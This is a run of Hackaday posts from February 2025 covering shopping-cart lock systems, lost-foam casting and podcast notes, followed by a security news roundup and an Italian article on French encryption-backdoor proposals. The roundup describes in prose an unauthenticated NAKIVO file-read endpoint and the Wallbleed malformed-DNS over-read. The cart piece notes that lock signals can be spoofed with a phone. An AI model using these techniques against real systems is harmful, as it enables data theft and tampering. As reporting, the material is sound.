There’s something compelling about turning the display and watching the particles tumble and flow, particularly when they’re all set to different colors. [mircemk] also gave the build the ability to operate in several different modes, running “sand,” “liquid” and “gas” simulations and with dynamic coloring to boot.

We’ve seen some great videos from [mircemk] before, too, like this sensitive metal detector rig.

youtube.com/embed/AwRup7wAijU?…

hackaday.com/2025/02/28/low-re…

The original locking wheel.
Shopping carts are surprisingly expensive. Prices range up to about $300 for a cart, which may seem like a lot, but they have to be pretty rugged and are made to work for decades. Plastic carts are cheaper, but not by much.

And carts have a way of vanishing. We’ve seen estimates that cart theft costs hundreds of millions of dollars worldwide annually. To stem the tide, stores sometimes pay a reward to people to round up carts off the street and return them to the store — it’s cheaper than buying a new one. That led [Elmer Isaacks] to patent a solution to this problem in 1968.

The [Isaacks] system used lots of magnets. A cart leaving the store had a brake that would be armed by running over a magnet. Customers were expected to follow a path surrounded by magnets to prevent the brake from engaging. If you left the track, a rod passing through the wheel locked it.

A third magnet would disarm the brake when you entered the store again. This is clever, but it has several problems. First, you have to insert magnets all over the place. Second, if someone knows how the system works, a simple magnet will hold the brake off no matter what.
The original modern-style court from a 1946 paten
There are some low-tech ways to stop theft, too. For example, if the store has barriers too narrow for the carts to pass, customers can’t leave the store. That’s not very nice if you are trying to get a week’s worth of stuff to your car. You sometimes see poles on carts rising taller than the door, to prevent the cart from leaving the building, which, of course, has the same problem.

Some stores, particularly Aldi, require a small deposit to get a cart. You get the deposit back when you return the cart. This not only discourages theft but also cuts down on having to hire kids to round up carts in the parking lot. The problem is that the deposit is usually a low-denomination coin, so if you really want to steal a $200 shopping cart, losing a quarter is probably not much of a deterrent.

Higher Tech

Building on the [Isaacks] solution, more modern systems use a perimeter fence — usually a wire, but sometimes magnets — that causes the brake to engage if you roll the cart over it.

This drives the cost up and is expensive to install. Worse, if you only have one wheel lock, a smart customer could lift that wheel off the ground and bypass the virtual fence. That means you probably want two locking wheels, although that still doesn’t preclude a strong thief or two thieves from carrying the cart over the line. You can see a breakdown of what’s happening in the Science Channel video below.

youtube.com/embed/PWZOeM5jdjg?…

Smart cart locks can also help solve “pushout,” an industry term for people filling a cart and walking out without paying. A properly equipped cart can determine if it exits the store without going through a checkout line. This is probably error-prone and not foolproof, but it might stop many pushouts.

youtube.com/embed/e7KzPQrzY-c?…

Where’s the Hack?

Many common carts use 7.8 kHz signals on the sensing wire. Since that’s within the range of audio, you can actually hack them pretty easily.

A DEFCON presentation shows how you can use your phone to lock and unlock shopping carts. Not that we suggest you do that. As [Joseph Gabay] notes: “I never really wanted a shopping cart, but…I have the knowledge that if I wanted a shopping cart, I could have one.” His video below shows many of the internal details of some of the common shopping cart systems.

youtube.com/embed/fBICDODmCPI?…

Who Knew?

You’d think a shopping cart was about the simplest thing you’d deal with all day. But, like many things these days, it conceals some very high-tech electronics. And it seems like there should be some better options. Locking wheels might be fine when you have someone actually stealing, but if you ever have a cart lock up while you are moving quickly, it isn’t pleasant.

If you become super interested in shopping carts, the National Museum of American History has a section of shopping carts. Why not? People get obsessed with strange things. If the modern system seems familiar, maybe you are thinking of invisible doggie fences. If you want to hack a cart, you probably want to buy your own to start with.

Featured image: “Large Capacity Shopping Cart” from the National Museum of American History collection.

hackaday.com/2025/02/28/tech-i…

This week, Hackaday’s Elliot Williams and Kristina Panos met up in a secret location with snacks to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.

First up in the news, and there’s a lot of it: we announced the Hackaday Europe 2025 workshops and a few more speakers, though the big keynote announcement is still to come. In case you missed it, KiCad 9 moved up into the pro league, and finally, we’re hiring, so come join us in the dungeon.

On What’s That Sound, Kristina didn’t get close at all, but at least had a guess this time. That’s okay, though, because nobody got it right! We’re still giving a t-shirt away to [Dakota], though, probably because Elliot has a thing for using random number generators.

Then it’s on to the hacks and such beginning with a beautiful handheld compass CNC and cyanotype prints made with resin printer’s UV light. After that, we take a look at open-source random numbers, a 3D-printed instant camera, and a couple of really cool cyberdecks. Finally, we discuss whether DOOM is doomed as the port of choice in this day and age, and kvetch about keyboards.

Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!

html5-player.libsyn.com/embed/…

Download in DRM-free MP3 and savor at your leisure.

Where to Follow Hackaday Podcast

Places to follow Hackaday podcasts:

• iTunes
• Spotify
• Stitcher
• RSS
• YouTube
• Check out our Libsyn landing page

Episode 310 Show Notes:

News:

• Hackaday Europe 2025: Workshops And More Speakers
• KiCad 9 Moves Up In The Pro League
• We’re Hiring: Come Join Us!

What’s that Sound?

• Congrats to [Dakota] who drew lucky number 13 and a Hackaday Podcast t-shirt!

Interesting Hacks of the Week:

• Handheld Compass CNC Lets Teensy Do The Driving
  
  • Hands-On The Shaper Origin: A Tool That Changes How We Build

  
  

• Cyanotype Prints On A Resin 3D Printer
  
  • Using A Potato As Photographic Recording Surface

  
  

• Open-Source Random Numbers
• 3D Print An Instant Camera
• Harvesting Water With High Voltage
• A Precisely Elegant Cyberdeck Handheld

Quick Hacks:

• Elliot’s Picks:
  
  • Pico Gets A Speed Bump
  • A Web-Based Graphics Editor For Tiny Screens
  • To Test A (Smart) LED
  • Import GPU: Python Programming With CUDA
  • SHOUT For Smaller QR Codes

  
  

• Kristina’s Picks:
  
  • 3D Print Yourself A Split Flap Display
  • The Perfect Pi Pico Portable Computer
  • Infill Injection Experiment Makes Stronger Parts

  
  

Can’t-Miss Articles:

• What Game Should Replace Doom As The Meme Port Of Choice?
• Keebin’ With Kristina: The One With All The Green Keyboards

hackaday.com/2025/02/28/hackad…

[Kelly Coffield] makes intake manifolds for old Ford throttle bodies for fun, demonstrating an excellent technique for making such things in the small shop. The mould patterns are CNC machined from a solid polystyrene block, with all the necessary gates to feed the aluminium into the mould. The principle is to introduce aluminium from a large central runner into the mould structure, which feeds the gates into the mould parts. The various foam mould components are then glued with an extra brace bar at the bottom to strengthen it.
Dip coating with a refractory slurry
The complete structure is then sprayed with surfactant (just plain old soapy water) and dip-coated in a refractory slurry. The surfactant adjusts the coating’s surface tension, preventing bubbles from forming and ruining the surface quality produced by this critical coating step.

Once a satisfactory coating has been applied and hardened, the structure is placed inside a moulding pan fitted with a pneumatic turbine vibrator, to allow sand to be introduced. The vibrations ease the flow of sand into all the nooks and crannies, fully supporting the delicate mould structure against the weight of the metal, and gases produced as the foam burns away. A neat offset pouring cup is then added to the top of the structure and packed in with more sand to stabilise it. It’s a simple setup that can easily be replicated in any hackerspace or backyard for those motivated enough. [Kelly] is using A356 aluminium alloy, but there’s no reason this technique won’t work for other metals.

It was amusing to see [Kelly] demould by just dumping out the whole stack onto the drive and throwing the extracted casting into a snow bank after quenching. We might as well use all that free Midwest winter cooling capacity! After returning to the shop, [Kelly] would typically perform any needed adjustments, such as improving flatness in the press, while the part was in the ‘as cast temper’ condition. We’ll gloss over the admission of cutting the gates off on the table saw! After these adjustments, the part is artificially aged to a T5-like specification, to give it its final strength and machinability properties. There are plenty more videos on this process on the channel, which is well worth a look.

Aluminium casting is nothing new here, here’s a simple way to cast using a 3D printed pattern. But beware, casting aluminum can be hazardous, it does like to burn.

youtube.com/embed/zxFAhnvXzys?…

Thanks to [Chuck] for the tip!

hackaday.com/2025/02/28/lost-f…

It’s usually not a good sign when your downloaded theme contains obfuscated code. Yes, we’re talking about the very popular Material Theme for VSCode. This one has a bit of a convoluted history. One of the authors wanted to make some money from all those downloads. The original Material Theme was yanked from the VSCode store, the source code (improperly) re-licensed as closed source, and replaced with freemium versions. And this week, those freemium versions have been pulled by Microsoft for containing malware.

Now there’s a quirk to this story. No one has been able to answer a simple yet vital question: What exactly did the theme plugin do that was malicious? The official response is that “A theming extension with heavily obfuscated code and unreasonable dependencies including a utility for running child processes”. Looking at the official statements and unofficial security reviews, I can’t find confirmation that the plugins have actually been observed doing something malicious. The only concrete problem is that the plugin shipped obfuscated JavaScript. There are several incomplete statements about a problem with a sanity.io dependency that may have been compromised.

The conclusion at this point is that a thorough security review of these plugins has not been published. The Microsoft team found enough problematic elements in the plugins to trigger pulling them. But I join the chorus of voices calling on Microsoft to clearly answer the vital question: Have any users of Material Theme plugins actually been compromised?

Low-hanging Backups

NAKIVO backup has an interesting endpoint, the getImageByPath call that’s used for loading the system’s logo, and is accessible for unauthenticated users. It’s pretty simple, just taking a path to a file on the appliance filesystem, and returning the byte array for use as an image. And of course, it doesn’t check whether the requested file is actually an image. Nor is it limited to a list of allowed paths.

So hence we essentially have an arbitrary file read. It’s not entirely arbitrary, as the file is first loaded into memory before being served. So the backups themselves are likely too big to successfully exfiltrate in this way. There are still some rather interesting targets, including the system logs. But the real juicy target is the system database itself. Thankfully, the user credentials for the NAVIKO system itself seem to be properly hashed to avoid casual theft. But setting up useful backups will require all sorts of integrations, like SSH and AWS credentials. And those are stored in plain text inside the database. Whoops.

Apple Did What?

A couple weeks ago we talked about Apple and the UK government having a tussle over iCloud backup encryption. Apple has finally rolled out end-to-end encryption for those backups, and the UK’s Snooper’s Charter has been used to require Apple to add an encryption backdoor in that system. That’s problematic for multiple reasons, and Apple has opted to not quietly oblige the UK government. You may have seen headlines that Apple has pulled access to the new Advanced Data Protection (ADP) for UK users. This seems to be the next step of anti-compliance with the new UK rule.

The logic here seems to be that not offering any end-to-end encrypted backup system for UK users is a better choice than claiming to offer such a system that actually contains a backdoor. That’s doubly true, as the law in question doesn’t seem to limit itself to UK users. If the UK government doesn’t back down on their extremely questionable demands, the next major step may be for Apple to pull sales from the country entirely.

Crypto Heist

We have a pair of crypto heist stories this week, with the first one being the largest in history. At a staggering $1.5 Billion, this seems like the biggest single theft of any kind to ever be successfully pulled off. And the details of how it was done are still a bit murky. The funds were stolen out of a Bybit “multisig” cold wallet. Those are clever currency stores that actually include smart contracts in the storage mechanism, requiring multiple owners to sign off on transactions.

It’s believed that this hack was pulled off by North Korean agents, through the use of very clever but simple techniques: Social engineering, and UI manipulation. In essence, a request for digital signature that claimed to do something benign, that actually unlocked the funds for theft. Some things never seem to change.

And that’s not all that’s happening with Cryptocurrency these days. It turns out that there’s another dead-simple attack that is targeting job-seeking individuals, instead of huge companies. “We may have a job for you, go to this website and run this application to apply!” Rather than a legitimate videoconferencing or interviewing application, the download is a simple backdoor. It’s used primarily to find crypto wallets and siphon the funds out.

Wallbleed

Remember Heartbleed? That’s the glitch in OpenSSL from 2014, where the TLS heartbeat implementation could trivially leak large amounts of system memory. Wallbleed is a strangely similar bug in the implementation of the Chinese Great Firewall system. One way the Great Firewall does censorship is via DNS injection. Request the DNS information for a blocked domain, and the firewall will intercept that request in real time, and return a spoofed response with a bogus IP address for the requested domain. Importantly for this discussion, that spoofing is bi-directional. You can send DNS requests to Chinese IP addresses, and get spoofed responses from the Great Firewall.

DNS request and response packets use an interesting variable length transport system, where the domain name being requested is turned into a set of length-value pairs. example.com is represented as 07example03com00. 7 bytes for the domain, then 3 bytes for the TLD, and a terminating null. Many of us are immediately wondering, what happens if that query was packed incorrectly: 07example20com00? There aren’t actually 20 bytes in the query, so what do various DNS responders do when handed such a query? Well-written DNS servers recognize that this is garbage, and just drop the packet. Some of the great firewall infrastructure did something far more interesting. It spoofs the DNS response, and performs a buffer over-read when constructing the response. Yes, leaking a few bytes of raw system memory back to the requester, a la Heartbleed.

And when we say “a few bytes”, the maximum observed leakage in a single spoofed response was 125. As you might imagine, that’s quite a bit of data. Enough data, in fact, to learn quite a bit about the Great Firewall and what sort of traffic it sees. There were also what appeared to be x86_64 pointers and Linux stack frames.

This attack was first discovered by researchers in 2021 and finally completely fixed in March 2024. In the intermediate time, those researchers used the vulnerability quite heavily to mine the Great Firewall infrastructure for data. This is an interesting ethical question. Normally it’s considered completely unacceptable to weaponize a vulnerability beyond what’s needed as a proof of concept. The Great Firewall is in some ways an adversarial device, making exploitation a bit murkier. On the other hand, vulnerabilities like this a usually disclosed in order to get them fixed. What is a researcher’s responsibility in this case, when the vulnerability is in a censorship device? It seems the Chinese authorities discovered the Wallbleed vulnerability themselves, excusing researchers from needing to fully answer this particular ethical question.

Bits and Bytes

It’s not surprising to open up an electronic device, and find an ugly glob of potting compound spread over one or several of the key chips inside. Or for some devices, the compound is ubiquitous, covering everything. [Graham Sutherland] has some thoughts on how to defeat the stuff. And while some is obvious, like using a drill press to very carefully expose a target interface, there are some really inventive ideas I would never have considered, like throwing an entire board into a pressure cooker for an hour!

How long does it take for a cyber criminal to go from initial access on an internal machine, to full access to a privileged computer? In the ReliaQuest case, it was 48 minutes. The hack was simple and clever. Start a mass spam and phishing campaign, and then pose as a helpful IT worker who could help end the carnage. All it takes is one employee to fall for the fake help desk routine, and 48 minutes.

Let’s say you wanted to pirate music from a streaming service like Deezer, but you really didn’t want your IP address or machine associated with the piracy. What would you do? Use Tor? VPNs? How about create a malicious PyPi package that does your downloading for you. That seems to be the bizarre case of automslc, a reasonably popular package that secretly downloads and scrapes from the music platform.

hackaday.com/2025/02/28/this-w…

La Francia si sta preparando ad approvare leggi che potrebbero rivoluzionare la sicurezza online, obbligando i fornitori di servizi di telecomunicazioni a installare backdoor nelle app di messaggistica crittografata e limitando l’accesso alle risorse Internet tramite VPN. L’iniziativa ha suscitato aspre critiche da parte di Tuta (ex Tutanota) e della VPN Trust Initiative (VTI).

Il primo disegno di legge controverso è un emendamento alla legge francese sul narcotraffico, che impone ai servizi di comunicazioni criptate di fornire alle forze dell’ordine i messaggi decriptati dei sospettati entro 72 ore dalla richiesta. Il mancato rispetto degli obblighi comporterà sanzioni fino a 1,5 milioni di euro per le persone fisiche e fino al 2% del fatturato globale annuo per le aziende. Sebbene la legge non sia ancora entrata in vigore, è già stata approvata dal Senato francese e passerà all’esame dell’Assemblea nazionale.

Tuta ha chiamato i parlamentari che hanno respinto l’emendamento, sostenendo che indebolire la crittografia avrebbe creato vulnerabilità non solo per i criminali, ma anche per gli utenti comuni. L’azienda sottolinea che, anche se la backdoor viene creata nell’interesse delle forze dell’ordine, può essere utilizzata da criminali informatici e agenzie governative. Tuta ha sottolineato che tali iniziative violano le leggi dell’UE sulla protezione dei dati (GDPR) e anche gli standard tedeschi sulla sicurezza informatica.

Contemporaneamente, in Francia si sta valutando un’altra innovazione: l’obbligo per i servizi VPN di bloccare l’accesso ai siti pirata. La holding mediatica Canal+ e la Lega calcio francese (LFP) hanno lanciato un’iniziativa in tal senso, chiedendo ai provider Internet e ai servizi VPN di limitare l’accesso a determinate risorse web.

VPN Trust Initiative (VTI), che include AWS, Google, Cloudflare, Namecheap, OVH, IPVanish VPN, Ivacy VPN, NordVPN, PureVPN ed ExpressVPN, ha condannato una mossa del genere, affermando che la lotta alla pirateria non dovrebbe portare alla censura e alla violazione dei diritti degli utenti. Nella sua lettera aperta, l’organizzazione ha tracciato parallelismi tra l’iniziativa e le restrizioni imposte a Internet in altri paesi, tra cui Cina, Myanmar e Iran, sottolineando che tali misure costituiscono un precedente per la censura di massa.

La Francia non è l’unico Paese in cui il controllo sui dati Internet sta aumentando. Nel Regno Unito, il governo ha recentemente richiesto da Apple di fornire l’accesso ai backup crittografati di iCloud. In risposta, l’azienda ha spento l’opzione di crittografia end-to-end per gli utenti del Regno Unito. In Svezia è in preparazione un disegno di legge che obbligherà i messaggeri Signal e WhatsApp creare backdoor tecniche per fornire l’accesso ai messaggi crittografati.

Di recente è emersa anche la notizia che il capo dell’Europol Catherine De Bolle vuole collaborare con le principali aziende tecnologiche per ampliare la cooperazione con le forze dell’ordine sulle questioni relative alla crittografia. A suo avviso, il rifiuto di tale interazione potrebbe rappresentare una minaccia per la democrazia europea.

L'articolo I Venti di Sorveglianza Di Massa Invadono l’Europa! Anche La Francia vuole Backdoor per eludere la crittografia proviene da il blog della sicurezza informatica.